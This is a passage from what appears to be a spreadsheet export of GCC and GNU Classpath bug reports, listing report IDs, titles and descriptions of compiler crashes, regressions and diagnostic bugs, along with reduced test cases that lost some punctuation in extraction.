       .def  __M_ios_fctype   .val  124  .scl  8 .tag  _St5ctypeIcE  .size 28   .type 030  .endef
       .def  __M_fnumput   .val  128  .scl  8 .type 030  .endef
       .def  __M_fnumget   .val  132  .scl  8 .tag  _St7num_getIcSt19istreambuf_iteratorIcSt11char_traitsIcEEE .size 8 .type 030  .endef
       .def  .eos .val  136  .scl  102  .tag  _St9basic_iosIcSt11char_traitsIcEE .size 136  .endef
       .def  _St9basic_iosIcSt11char_traitsIcEE .scl  13   .tag  _St9basic_iosIcSt11char_traitsIcEE .size 136  .type 010  .endef
       .def  _Si  .scl  10   .type 010  .size 144  .endef
       .def  _St9basic_iosIcSt11char_traitsIcEE .val  8 .scl  8 .tag  _St9basic_iosIcSt11char_traitsIcEE .size 136  .type 010  .endef
===&gt;   .def  __vptr$basic_istream &gt;   .val  0 .scl  8 .type 01124   .endef
       .def  __M_gcount .val  4 .scl  8 .type 04   .endef
       .def  .eos .val  144  .scl  102  .tag  _Si  .size 144  .endef
       .def  _Si  .scl  13   .tag  _Si  .size 144  .type 010  .endef
       .def  _fake_istream .scl  13   .dim  144  .size 144  .type 062  .endef
       .def  _So  .scl  10   .type 010  .size 140  .endef
       .def  _St9basic_iosIcSt11char_traitsIcEE .val  4 .scl  8 .tag  _St9basic_iosIcSt11char_traitsIcEE .size 136  .type 010  .endef
===&gt;   .def  __vptr$basic_ostream &gt;   .val  0 .scl  8 .type 01124   .endef
       .def  .eos .val  140  .scl  102  .tag  _So  .size 140  .endef
       .def  _So  .scl  13   .tag  _So  .size 140  .type 010  .endef
       .def  _fake_ostream .scl  13   .dim  140  .size 140  .type 062  .endef
       .def  __ZSt3cin  .val  __ZSt3cin  .scl  2 .dim  144  .size 144  .type 062  .endef
    .globl __ZSt3cin
       .section .bss
       .p2align 5
.....................    
       .ident   GCC: (GNU) 3.1 20010418 (experimental)
Release:
CVS versions of gcc-3.0 and gcc-3.1 (after March 20 2001)
Environment:
DJGPP (both building native compiler under Win98SE and building Linux to DJGPP cross-compiler under Linux)
How-To-Repeat:
Trying to build current CVS version of gcc-3.[01] (newer than approx. March 20 2001) for target i586-pc-msdosdjgpp
(both native compiler and cross-compiler from Linux)</t>
  </si>
  <si>
    <t>GCC-11980</t>
  </si>
  <si>
    <t>[3.4 regression] ICE building cplus-dem.c for x86_64-freebsd5.1: in emit_move_insn at expr.c:3206</t>
  </si>
  <si>
    <t>Building a cross compiler to freebsd 5.1/x86_64 with mainline (20030819) gives:
/tmp/mainline/objdir/gcc/xgcc -B/tmp/mainline/objdir/gcc/ -B/tmp/dara/x86_64-freebsd5.1//
x86_64-freebsd5.1/bin/ -B/tmp/dara/x86_64-freebsd5.1//x86_64-freebsd5.1/lib/ -isystem /
tmp/dara/x86_64-freebsd5.1//x86_64-freebsd5.1/include -isystem /tmp/dara/x86_64-
freebsd5.1//x86_64-freebsd5.1/sys-include -c -DHAVE_CONFIG_H -O2 -g -O2 -I. -I../../../gcc/
libiberty/../include  -W -Wall -Wtraditional -pedantic ../../../gcc/libiberty/cplus-dem.c -o cplus-
dem.o
../../../gcc/libiberty/cplus-dem.c: In function `cplus_demangle_opname':
../../../gcc/libiberty/cplus-dem.c:710: internal compiler error: in emit_move_insn at expr.c:3206
Lowering optimization level to -O0 the code does not ICE but at -O1 or higher it does. Here's a 
reduced snippet:
char *strcat(char *  const char * )
void foo(char *result)
{
    strcat (result operator)
}
Note that while the error is the same as in PR11974 the testcase for that bug doesn't ICE on this 
target nor does the one for this bug ICE on that target.
This is a regression from the 3.3 branch (20030819) where the code compiles fine.</t>
  </si>
  <si>
    <t>CLASSPATH-22780</t>
  </si>
  <si>
    <t>enhance build.xml with debug=true for javac</t>
  </si>
  <si>
    <t>such that I can see the sources in eclipse
and log4j tells me where I print my log statements</t>
  </si>
  <si>
    <t>GCC-66942</t>
  </si>
  <si>
    <t>trans-expr.c:5701 runtime error: member call on null pointer of type 'struct vec'</t>
  </si>
  <si>
    <t>! gcc-5.2.0/gcc/fortran/trans-expr.c:5701:19: runtime error: member call on null pointer of type 'struct vec'
! gfortran source line retargs-&gt;splice (arglist)
! retargs is NULL
! double check with gcc_assert(retargs) immediately before
      call sub 
      END</t>
  </si>
  <si>
    <t>GCC-2680</t>
  </si>
  <si>
    <t>operator new override bug</t>
  </si>
  <si>
    <t>void * operator new(unsigned unsigned)
void * doodaa(unsigned n)
{
 return new (1) int[n]
}
//I used Msc 7 (circa 1990) and it works fine.
20010430 jdennett:
Msc7 is at fault gcc agrees with the Standard and with Comeau's compiler.
Release:
2.95
Environment:
gcc C++
How-To-Repeat:
void * operator new(unsigned unsigned)
void * doodaa(unsigned n)
{
 return new (1) int[n]
}</t>
  </si>
  <si>
    <t>cwoollat</t>
  </si>
  <si>
    <t>GCC-53198</t>
  </si>
  <si>
    <t>[4.7 Regression] gcc wrongly emits array subscript is above array bounds for simple arrays</t>
  </si>
  <si>
    <t>simple code that processes arrays based on NULL terminator rather than ARRAY_SIZE
$ cat test.c
void *devices[] = { 0 }
int main()
{
        int i
        for (i = 0 devices[i] i++)
        return 0
}
$ gcc -Warray-bounds -O2 test.c 
test.c: In function 'main':
test.c:5:21: warning: array subscript is above array bounds [-Warray-bounds]
looks like it started failing with 4.6.0 ... older versions are fine.</t>
  </si>
  <si>
    <t>GCC-83170</t>
  </si>
  <si>
    <t>[8 Regression] ICE: Segmentation fault - during GIMPLE pass: store-merging</t>
  </si>
  <si>
    <t>Created attachment 42722
C++ source code
The attached C++ code with recent gcc trunk does this:
during GIMPLE pass: store-merging
bug399.cc: In member function â€˜virtual ssize_t udp::UdpTransport::Read(void* si
ze_t)â€™:
bug399.cc:20661:9: internal compiler error: Segmentation fault
 ssize_t UdpTransport::Read(void* data size_t length) {
         ^~~~~~~~~~~~
0xfe790f crash_signal
	../../trunk/gcc/toplev.c:325
0x129879c verify_use
	../../trunk/gcc/tree-ssa.c:864
0x129879c verify_ssa(bool bool)
	../../trunk/gcc/tree-ssa.c:1141
0xe65907 execute_function_todo
	../../trunk/gcc/passes.c:2001
The bug seems to occur between revisions 254924 and 255154.
I'll have a go at reducing the code.</t>
  </si>
  <si>
    <t>GCC-50259</t>
  </si>
  <si>
    <t>Internal Error at (1): gfc_resolve_expr(): Bad expression type</t>
  </si>
  <si>
    <t>The following invalid code (note the continuation)
MODULE cp_parser_types
  TYPE cp_parser_type
     CHARACTER(LEN=1)                               :: comment_character(2)&amp;
     CHARACTER (len=default_path_length) DIMENSION(::) POINTER :: initial_variables
  END TYPE cp_parser_type
END MODULE cp_parser_types
yields:
Internal Error at (1):
gfc_resolve_expr(): Bad expression type</t>
  </si>
  <si>
    <t>GCC-68162</t>
  </si>
  <si>
    <t>[5 Regression] Incompatible pointer type using a typedef</t>
  </si>
  <si>
    <t>Created attachment 36623
the preprocessed file
I'm getting a warning about incompatible pointer types that is not expected. 
I've extracted the problem to a small example that reproduces the error:
typedef const double ConstSpiceDouble
void foo(const double (*)[3]) 
int main(int argc char **argv) {
  double a[3][3] = {{123}{123}{123}}
  foo((ConstSpiceDouble (*)[3])a)
  return 0
}
The compiler reports this:
$~/gcc/bin/gcc --version
gcc (Debian 5.2.1-22) 5.2.1 20151010
~/gcc/bin/gcc -Wall -c typedef.c
typedef.c: In function â€˜mainâ€™:
typedef.c:13:7: warning: passing argument 1 of â€˜fooâ€™ from incompatible pointer type [-Wincompatible-pointer-types]
   foo((ConstSpiceDouble (*)[3])a)
       ^
typedef.c:7:6: note: expected â€˜const double (*)[3]â€™ but argument is of type â€˜const ConstSpiceDouble (*)[3] {aka const double (*)[3]}â€™
 void foo(const double (*)[3]) 
      ^
The note from gcc is especially troubling since it seems to admit that the two types are identical yet it complains anyway.</t>
  </si>
  <si>
    <t>campus</t>
  </si>
  <si>
    <t>GCC-51969</t>
  </si>
  <si>
    <t>[4.6 regression] trunk gcc unable to build gcc 4.6</t>
  </si>
  <si>
    <t>gcc-4.7 doesn't build gcc-4.6 anymore:
gtype-desc.c:8893:18: error: subscripted value is neither array nor pointer nor vector
gtype-desc.c:9012:36: error: subscripted value is neither array nor pointer nor vector
gtype-desc.c:9096:31: error: subscripted value is neither array nor pointer nor vector
gtype-desc.c:9117:31: error: subscripted value is neither array nor pointer nor vector
gtype-desc.c:9124:31: error: subscripted value is neither array nor pointer nor vector
gtype-desc.c:9131:31: error: subscripted value is neither array nor pointer nor vector
make[3]: *** [gtype-desc.o] Error 1
make[3]: *** Waiting for unfinished jobs....
or with --enable-build-with-cxx:
gtype-desc.c:8893:20: error: no match for â€˜operator[]â€™ in â€˜x_rtl[0]â€™
gtype-desc.c:9012:38: error: no match for â€˜operator[]â€™ in â€˜default_target_libfuncs[0]â€™
gtype-desc.c:9096:33: error: no match for â€˜operator[]â€™ in â€˜default_target_rtl[0]â€™
gtype-desc.c:9117:33: error: no match for â€˜operator[]â€™ in â€˜default_target_rtl[0]â€™
gtype-desc.c:9124:33: error: no match for â€˜operator[]â€™ in â€˜default_target_rtl[0]â€™
gtype-desc.c:9131:33: error: no match for â€˜operator[]â€™ in â€˜default_target_rtl[0]â€™
make[3]: *** [gtype-desc.o] Error 1
make[3]: *** Waiting for unfinished jobs....
(gcc-4.6.3 builds gcc-4.6 without problems.)</t>
  </si>
  <si>
    <t>GCC-55609</t>
  </si>
  <si>
    <t>Segmentation fault while compiling ncurses 5.9</t>
  </si>
  <si>
    <t>Created attachment 28886
The preprocessed file
While compiling ncurses 5.9 on my system I get the following error:
make[1]: Entering directory `/home/cup/Downloads/ncurses-5.9/ncurses'
gcc -DHAVE_CONFIG_H -I../ncurses -I.  -D_GNU_SOURCE -DNDEBUG -I. -I../include -O2 --param max-inline-insns-single=1200 -g -DTRACE -c ../ncurses/./trace/lib_tracedmp.c -o ../obj_g/lib_tracedmp.o
../ncurses/./trace/lib_tracedmp.c: In function â€˜_tracedumpâ€™:
../ncurses/./trace/lib_tracedmp.c:180:1: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[1]: *** [../obj_g/lib_tracedmp.o] Error 1
make[1]: Leaving directory `/home/cup/Downloads/ncurses-5.9/ncurses'
make: *** [all] Error 2
Output from gcc -v:
$ gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/lib/x86_64-linux-gnu/gcc/x86_64-linux-gnu/4.6.1/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Ubuntu 4.6.0-3~ppa1' --with-bugurl=file:///usr/share/doc/gcc-4.6/README.Bugs --enable-languages=cc++fortranobjcobj-c++go --prefix=/usr --program-suffix=-4.6 --enable-shared --enable-multiarch --with-multiarch-defaults=x86_64-linux-gnu --enable-linker-build-id --with-system-zlib --libexecdir=/usr/lib/x86_64-linux-gnu --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.6 --libdir=/usr/lib/x86_64-linux-gnu --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-plugin --enable-objc-gc --disable-werror --with-arch-32=i686 --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 4.6.1 20110409 (prerelease) (Ubuntu 4.6.0-3~ppa1) 
Command used:
~/Downloads/ncurses-5.9/ncurses$ gcc -DHAVE_CONFIG_H -I../ncurses -I.  -D_GNU_SOURCE -DNDEBUG -I. -I../include -O2 --param max-inline-insns-single=1200 -g -DTRACE -c ../ncurses/./trace/lib_tracedmp.c -o ../obj_g/lib_tracedmp.o
../ncurses/./trace/lib_tracedmp.c: In function â€˜_tracedumpâ€™:
../ncurses/./trace/lib_tracedmp.c:180:1: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Please let me know if you need any more information.
Best regards
Christian Uldall Pedersen</t>
  </si>
  <si>
    <t>GCC-37985</t>
  </si>
  <si>
    <t>[4.5/4.6/4.7/4.8 Regression] unsigned char shift lacks statement with no effect warning</t>
  </si>
  <si>
    <t>I would have expected a warning statement with no effect
for this code:
$ cat tmp.c
unsigned char foo(unsigned char a)
{
  a &gt;&gt; 2
  return a
}
$ gcc -S -Wall -O3 -Wextra tmp.c
$</t>
  </si>
  <si>
    <t>GCC-81853</t>
  </si>
  <si>
    <t>[ 6/7/8 Regression] using namespace is not a constant expression in a statement expression</t>
  </si>
  <si>
    <t>$ g++ --version
g++ (GCC) 7.1.1 20170630
Copyright (C) 2017 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
---------------------------------------------------------------------------
$ cat test.cpp 
namespace test {
constexpr int test_fun() { return 42 }
}
#define test_macro() \
({ \
    using namespace test \
    test_fun() \
})
int main()
{
    constexpr int test_var = test_macro()
    return test_var
}
---------------------------------------------------------------------------
$ g++ test.cpp 
test.cpp: In function â€˜int main()â€™:
test.cpp:8:19: error: statement is not a constant expression
   using namespace test \
                   ^
test.cpp:14:30: note: in expansion of macro â€˜test_macroâ€™
     constexpr int test_var = test_macro()
                              ^~~~~~~~~~
---------------------------------------------------------------------------
Clang accepts this since 3.4:
$ clang++ test.cpp -std=c++14  echo $?
42</t>
  </si>
  <si>
    <t>GCC-62239</t>
  </si>
  <si>
    <t>[5 Regression] ICE: in execute_todo at passes.c:1795 with LTO</t>
  </si>
  <si>
    <t>cat &gt; foo.c
char *foo(unsigned n)
{
  char *s = __builtin_calloc(1 n)
  return __builtin___strcat_chk(s   __builtin_object_size(s 0))
}
^D
$ gcc -O -flto -shared foo.c
foo.c: In function 'foo':
foo.c:1:7: internal compiler error: in execute_todo at passes.c:1795
 char *foo(unsigned n)
       ^
0x84e3f13 execute_todo
        ../../gcc-5/gcc/passes.c:1795
Please submit a full bug report
[...]</t>
  </si>
  <si>
    <t>GCC-31244</t>
  </si>
  <si>
    <t>data initialization with more than 2**32 elements</t>
  </si>
  <si>
    <t>$ cat data.f90
program main
  integer(kind=1) dimension(4294967296_8) :: i
  data i /4294967296_8 * 1_1/
  print *i(1)
end program main
$ gfortran data.f90
data.f90:3.24:
  data i /4294967296_8 * 1_1/
                       1
Error: Integer value too large in expression at (1)
This is probably due to the use of gfc_match_int() in
top_val_list.</t>
  </si>
  <si>
    <t>GCC-2583</t>
  </si>
  <si>
    <t>A function declared __inline__ takes exponential compile time on IA64</t>
  </si>
  <si>
    <t>A function with some integer arithmetic operations is declared with the __inline__ specifier. With -O or higher it takes a long time to compile on IA64. In particular it is exponential in the number of statements
(count *= 10) in the function.
The x86 gcc (same 200010402 snapshot) does not have this behavior.
Release:
gcc version 3.0 20010402
Environment:
IA64 Linux 2.4.0test10-001115-58smp
How-To-Repeat:
// compile with -O or higher
int count = 1 // no problem with double
static __inline__ void
 toobig(void ) {
    count *= 10 // also depends on this value
    count *= 10 // takes more time for larger values
// 2
    count *= 10
    count *= 10
// 4  
    count *= 10
    count *= 10
// 6
    count *= 10
    count *= 10
// 8  
    count *= 10
    count *= 10
// 10
    count *= 10
    count *= 10
// 12  
    count *= 10
    count *= 10
// 14
    count *= 10
    count *= 10
// 16  
    count *= 10
// 17 
    count *= 10
// 18  
    count *= 10
// 19
    count *= 10
// 20
    count *= 10
// 21
#if 0
    count *= 2
// 22
    count *= 10
// 23  
    count *= 10
// 24
#endif
} 
int main(){
 toobig()
 printf(count = %d\ncount)
}</t>
  </si>
  <si>
    <t>GCC-40071</t>
  </si>
  <si>
    <t>ICE (aliasing assert) in vectorizable_store at tree-vect-stmts.c:3117</t>
  </si>
  <si>
    <t>As shown in:
http://gcc.gnu.org/ml/gcc-testresults/2009-05/msg00618.html
		=== gnat tests ===
Running target unix/-mabi=32
		=== gnat Summary for unix/-mabi=32 ===
# of expected passes		635
# of expected failures		6
Running target unix/-mabi=n32
FAIL: gnat.dg/loop_optimization1.adb (test for excess errors)
		=== gnat Summary for unix/-mabi=n32 ===
# of expected passes		634
# of unexpected failures	1
# of expected failures		6
Running target unix/-mabi=64
FAIL: gnat.dg/loop_optimization3.adb execution test
		=== gnat Summary for unix/-mabi=64 ===
# of expected passes		634
# of unexpected failures	1
# of expected failures		6
		=== gnat Summary ===
# of expected passes		1903
# of unexpected failures	2
# of expected failures		18
		=== libgomp tests ===
So works in abi=32 but ICE in abi=n32 and abi=64
Executing on host: /home/guerby/build-147209/gcc/gnatmake --GCC=/home/guerby/build-147209/gcc/xgcc --GNATBIND=/home/guerby/build-147209/gcc/gnatbind --GNATLINK=/home/guerby/build-147209/gcc/gnatlink -cargs -B/home/guerby/build-147209/gcc -largs --XCC=/home/guerby/build-147209/gcc/xgcc -B/home/guerby/build-147209/gcc -margs --RTS=/home/guerby/build-147209/mips64el-unknown-linux-gnu/./libada -q -f /home/guerby/trunk/gcc/testsuite/gnat.dg/loop_optimization1.adb  -O3 -c -S  -mabi=n32 -o loop_optimization1.s    (timeout = 300)
+===========================GNAT BUG DETECTED==============================+
| 4.5.0 20090506 (experimental) [trunk revision 147209] (mips64el-unknown-linux-gnu) GCC error:|
| in vectorizable_store at tree-vect-stmts.c:3108                         |
| Error detected around /home/guerby/trunk/gcc/testsuite/gnat.dg/loop_optimization1.ads:33|
| Please submit a bug report see http://gcc.gnu.org/bugs.html.            |
| Use a subject line meaningful to you and us to track the bug.            |
| Include the entire contents of this bug box in the report.               |
| Include the exact gcc or gnatmake command that you entered.              |
| Also include sources listed below in gnatchop format                     |
| (concatenated together with no headers between files).                   |
+==========================================================================+</t>
  </si>
  <si>
    <t>GCC-42151</t>
  </si>
  <si>
    <t>[4.5 Regression] verify_cgraph_node failed with -O3 -Winline</t>
  </si>
  <si>
    <t>I just tried to compile Suse Linux package libxml2-2.7.3-3.1
with gcc version 4.5 snapshot 20091119 and the build said
tree.c:1629:1: error: caller edge frequency 789 does not match BB freqency 1577
tree.c:1629:1: error: edge xmlNodeListGetString__internal_alias.clone.4-&gt;xmlEncodeEntitiesReentrant__internal_alias has no corresponding call_stmt
...
tree.c:1629:1: internal compiler error: verify_cgraph_node failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source code attached. Flags -O3 -Winline required.</t>
  </si>
  <si>
    <t>GCC-65316</t>
  </si>
  <si>
    <t>[5 Regression] LTO: Uninitialized memory / ICE with -g -fno-lto-odr-type-merging: in types_same_for_odr at ipa-devirt.c:465</t>
  </si>
  <si>
    <t>Created attachment 34954
one.ii
Follow up to PR65276 and PR65302.
It turned out that is issue is due to uninitialized memory. Thus if the last command succeeds simply try again a couple of times (in delta I called it up to 25 times) - or run it under valgrind or similar.
It fails with the ICE:
lto1: internal compiler error: in types_same_for_odr at ipa-devirt.c:465
touch two.ii
g++ -c -std=c++11 -g2 -fno-lto-odr-type-merging -flto -O2 two.ii one.ii
gcc -r -nostdlib -O2 -fno-lto-odr-type-merging -flto one.o two.o</t>
  </si>
  <si>
    <t>GCC-32065</t>
  </si>
  <si>
    <t>Many dfp testsuite failures for -msse targets</t>
  </si>
  <si>
    <t>gcc -march=pentium4 -O2  cast.c
cast.c: In function Ã¢mainÃ¢:
cast.c:88: error: unrecognizable insn:
(insn 11 10 12 3 cast.c:52 (set (subreg:TI (reg:TD 63) 0)
        (subreg:TI (const_double:TD 0 [0x0] 2.0 [N/A]) 0)) -1 (nil)
    (nil))
cast.c:88: internal compiler error: in extract_insn at recog.c:2119
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-66636</t>
  </si>
  <si>
    <t>[6 Regression] ICE in vect_get_vec_def_for_stmt_copy at tree-vect-stmts.c:1590</t>
  </si>
  <si>
    <t>struct X { double x double y }
struct X *x
void foo (double px int s)
{
  int i
  for (i = 0 i &lt; 256 ++i)
    {
      x[i*s].x = px
      x[i*s].y = i + px
    }
}
with -O3 -mavx2
This causes ammp in SPEC 2000 to ICE.</t>
  </si>
  <si>
    <t>GCC-79616</t>
  </si>
  <si>
    <t>missing space in diagnostic: Inlined into %s which now has time</t>
  </si>
  <si>
    <t>From ipa-inline.c:
	  fprintf (dump_file
		    Inlined into %s which now has time %i and size %i
		   net change of %+i.\n
		   edge-&gt;caller-&gt;name ()
		   inline_summaries-&gt;get (edge-&gt;caller)-&gt;time
		   inline_summaries-&gt;get (edge-&gt;caller)-&gt;size
		   overall_size - old_size)
There is a space missing between %i and net.</t>
  </si>
  <si>
    <t>GCC-38033</t>
  </si>
  <si>
    <t>Bounds of  a pointer/allocatable array not stabilized</t>
  </si>
  <si>
    <t>Following thread from Thomas Breuel http://gcc.gnu.org/ml/fortran/2008-11/msg00044.html
program test
   integer parameter :: n = 100
   real pointer :: a(:)temp(:)  ! pointer or allocatable have the same effect
   allocate(a(n) temp(n))
   temp(1:size(a)) = a
end program
produces
test ()
{
  struct array01_real(kind=4) a
  struct array01_real(kind=4) temp
  static integer(kind=4) options.0[8] = {68 255 0 0 0 1 0 1}
  a.data = 0B
  temp.data = 0B
  _gfortran_set_options (8 (void *) 
  {
    void * D.646
    a.dtype = 281
    a.dim[0].lbound = 1
    a.dim[0].ubound = 100
    a.dim[0].stride = 1
    D.646 = __builtin_malloc (400)
    if (D.646 == 0B)
      {
        _gfortran_os_error (
      }
    a.data = D.646
    a.offset = -1
  }
  {
    void * D.647
    temp.dtype = 281
    temp.dim[0].lbound = 1
    temp.dim[0].ubound = 100
    temp.dim[0].stride = 1
    D.647 = __builtin_malloc (400)
    if (D.647 == 0B)
      {
        _gfortran_os_error (
      }
    temp.data = D.647
    temp.offset = -1
  }
  {
    integer(kind=4) D.664
    void * D.662
    void * D.661
    integer(kind=4) D.660
    integer(kind=4) D.659
    logical(kind=4) D.658
    struct array01_real(kind=4) atmp.1
    struct array01_real(kind=4) * D.656
    integer(kind=4) D.655
    struct array01_real(kind=4) * D.654
    integer(kind=4) D.653
    real(kind=4)[0:] * D.652
    integer(kind=4) D.651
    integer(kind=4) D.650
    integer(kind=4) D.649
    real(kind=4)[0:] * D.648
    D.648 = (real(kind=4)[0:] *) a.data
    D.649 = a.offset
    D.650 = a.dim[0].lbound
    D.651 = a.dim[0].ubound
    D.652 = (real(kind=4)[0:] *) temp.data
    D.653 = temp.offset
    D.654 = 
    D.655 = _gfortran_size0 (D.654)
    D.656 = 
    atmp.1.dtype = 281
    atmp.1.dim[0].stride = 1
    atmp.1.dim[0].lbound = 0
    atmp.1.dim[0].ubound = _gfortran_size0 (D.656) + -1
    D.658 = _gfortran_size0 (D.656) &lt;= 0
    D.659 = _gfortran_size0 (D.656)
    D.660 = D.658 ? 0 : D.659 * 4
    if (D.660 &lt; 0)
      {
        _gfortran_runtime_error (&amp;Attempt to allocate a negative amount of memo
ry.[1]{lb: 1 sz: 1})
      }
    D.661 = __builtin_malloc (MAX_EXPR )
    if (D.661 == 0B)
      {
        _gfortran_os_error (
      }
    D.662 = D.661
    atmp.1.data = D.662
    atmp.1.offset = 0
    D.664 = NON_LVALUE_EXPR 
    {
      integer(kind=4) D.667
      integer(kind=4) D.666
      integer(kind=4) S.2
      D.666 = a.dim[0].stride
      D.667 = temp.dim[0].stride
      S.2 = 0
      while (1)
        {
          if (_gfortran_size0 (D.656) + -1 &lt; S.2) goto L.1
          (*(real(kind=4)[0:] *) atmp.1.data)[S.2] = (*D.648)[(S.2 + D.664) * D.
666 + D.649]
          S.2 = S.2 + 1
        }
      L.1:
      S.2 = 0
      while (1)
        {
          if (_gfortran_size0 (D.656) + -1 &lt; S.2) goto L.2
          (*D.652)[(S.2 + 1) * D.667 + D.653] = (*(real(kind=4)[0:] *) atmp.1.da
ta)[S.2]
          S.2 = S.2 + 1
        }
      L.2:
    }
    {
      void * D.663
      D.663 = atmp.1.data
      if (D.663 != 0B)
        {
          __builtin_free (D.663)
        }
    }
  }
}
Calls to gfortran_size0 are appearing withing the scalarized loop because the expression for the upper bound of atmp is not stabilized.</t>
  </si>
  <si>
    <t>GCC-71643</t>
  </si>
  <si>
    <t>[7 Regression] internal compiler error: in redirect_eh_edge_1 at tree-eh.c:2318 after r237427</t>
  </si>
  <si>
    <t>Created attachment 38755
Reduced testcase
After r237427:
        PR tree-optimization/71520
        * tree-ssa-tail-merge.c (find_duplicate): Handle labels.
        (replace_block_by): Move user labels from bb1 to bb2.
        * gcc.dg/tree-ssa/pr71520.c: New test.
I'm seeing the following ICE for the attached reduced testcase when compiling with -O3 on aarch64-none-linux-gnu/x86_64-unknown-linux-gnu:
x.cpp:30:1: internal compiler error: in redirect_eh_edge_1 at tree-eh.c:2318
 foo (void)
 ^~~
0xd2d737 redirect_eh_edge_1
	.../gcc/tree-eh.c:2318
0xd2d8e7 redirect_eh_edge(edge_def* basic_block_def*)
	.../gcc/tree-eh.c:2370
0xd12d5e gimple_redirect_edge_and_branch
	.../gcc/tree-cfg.c:5664
0x8d2976 redirect_edge_and_branch(edge_def* basic_block_def*)
	.../gcc/cfghooks.c:356
0xec9098 replace_block_by
	.../gcc/tree-ssa-tail-merge.c:1538
0xec9098 apply_clusters
	.../gcc/tree-ssa-tail-merge.c:1635
0xec9098 tail_merge_optimize(unsigned int)
	.../gcc/tree-ssa-tail-merge.c:1743
0xe78871 execute
	.../gcc/tree-ssa-pre.c:4826
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-35528</t>
  </si>
  <si>
    <t>[4.4 Regression] 23_containers/bitset/operations/1.cc</t>
  </si>
  <si>
    <t>On Linux/Intel64 revision 133082 has 3 32bit regressions:
http://gcc.gnu.org/ml/gcc-testresults/2008-03/msg00754.html
FAIL: 23_containers/bitset/operations/1.cc execution test
Running target unix/-m32
FAIL: TestClosureGC run
FAIL: events output
Since revision 133080 + patch in revision 133082 is OK:
http://gcc.gnu.org/ml/gcc-testresults/2008-03/msg00754.html
I think those regressions are very likely caused by revision 133081:
http://gcc.gnu.org/ml/gcc-patches/2008-03/msg00629.html</t>
  </si>
  <si>
    <t>GCC-40208</t>
  </si>
  <si>
    <t>Redundant (dead) virtual-stack-vars stores related to tree-loop-im</t>
  </si>
  <si>
    <t>The following code:
long long foo (long long) 
void
FIR(short In[]short Out[]int nsamples)
{
  long long * vIn = (long long*)In
  long long * vOut = (long long*)Out
  int i
  long long sum0 sum1
  for (i = 0 i &lt; nsamples i++) {
	  sum0 = vIn[i] 
    vOut[i+1] = foo( 
	({union {long long d int w[2]} tmp_union 
	tmp_union.w[0] = ( ({ union {long long d int w[2]} tmp_union 
	tmp_union.d = (sum0) 
	tmp_union.w[0] })) 
	tmp_union.w[1] = ( ({ union {long long d int w[2]} tmp_union 
	tmp_union.d = (sum1) 
	tmp_union.w[0] })) 
	tmp_union.d })
	) 
  }
}
Compiled with:
&gt;gcc  -O2 -S ttt.c
&gt;gcc -v
Using built-in specs.
Target: x86_64-unknown-linux-gnu
Configured with: ../configure --enable-threads=posix --prefix=/prj/x86_gcc_4.4/bin --enable-languages=cc++ --disable-checking
Thread model: posix
gcc version 4.4.0 (GCC)
produces redundant (dead) stores to local stack location. The problem goes away with tree loop invariant code motion disabled (-fno-tree-loop-im flag). 
It also works fine with gcc 4.3.2 -O2 
I could track it down to the point of TREE_ADDRESSABLE flag (improperly) set to tmp_union declaration tree during tree-loop-im:
#0  build_fold_addr_expr_with_type_1 (t=0x2b88d7d5b780 ptrtype=0x2b88d7d62e40 in_fold=0 '\0') at fold-const.c:7945
#1  0x0000000000a1201d in get_inner_reference_aff (ref= addr=0x7fffd31e6330 size=0x7fffd31e6430) at tree-affine.c:844
#2  0x00000000007eab9d in ref_indep_loop_p (loop=0x2b88d7c0cea0 ref=0xdea300) at tree-ssa-loop-im.c:1643
#3  0x00000000007eb7f7 in determine_max_movement (stmt=0x2b88d7c01850 must_preserve_exec=) at tree-ssa-loop-im.c:589
#4  0x00000000007efce0 in determine_invariantness_stmt (dw_data= bb=) at tree-ssa-loop-im.c:971
#5  0x00000000009c8546 in walk_dominator_tree (walk_data=0x7fffd31e6770 bb=0x2b88d7d5e720) at domwalk.c:196
#6  0x00000000007ea458 in determine_invariantness () at tree-ssa-loop-im.c:1005
#7  0x00000000007ef0c0 in tree_ssa_lim () at tree-ssa-loop-im.c:2299
#8  0x000000000080d4e5 in tree_ssa_loop_im () at tree-ssa-loop.c:110
#9  0x0000000000687a79 in execute_one_pass (pass=0xcae480) at passes.c:1277
#10 0x0000000000687c7c in execute_pass_list (pass=0xcae480) at passes.c:1326
#11 0x0000000000687c95 in execute_pass_list (pass=0xcae540) at passes.c:1327
#12 0x0000000000687c95 in execute_pass_list (pass=0xcad5e0) at passes.c:1327
#13 0x000000000077acfd in tree_rest_of_compilation (fndecl=0x2b88d7d41a00) at tree-optimize.c:420
#14 0x00000000008ffb15 in cgraph_expand_function (node=0x2b88d7d41b00) at cgraphunit.c:1047
#15 0x000000000090182a in cgraph_optimize () at cgraphunit.c:1106
#16 0x0000000000416a1f in c_write_global_declarations () at c-decl.c:8102
#17 0x0000000000723b46 in toplev_main (argc= argv=0x0) at toplev.c:981
When present it causes severe performance degradation.</t>
  </si>
  <si>
    <t>GCC-44347</t>
  </si>
  <si>
    <t>SELECT_REAL_KIND: Wrongly accepts non-scalar arguments</t>
  </si>
  <si>
    <t>The following provokes the summary:
      dimension ip(1)ir(1)
      print *selected_real_kind(ipi)
      print *selected_real_kind(iir)
      end
Best regards
Vittorio Zecca</t>
  </si>
  <si>
    <t>GCC-54963</t>
  </si>
  <si>
    <t>[4.8 Regression] Wrong code generated for libgfortran/generated/eoshift3_8.c on SH</t>
  </si>
  <si>
    <t>Created attachment 28469
A test case
Several fortran tests using some eoshift functions fail on
sh4-unknown-linux-gnu for a while.  The above test case is
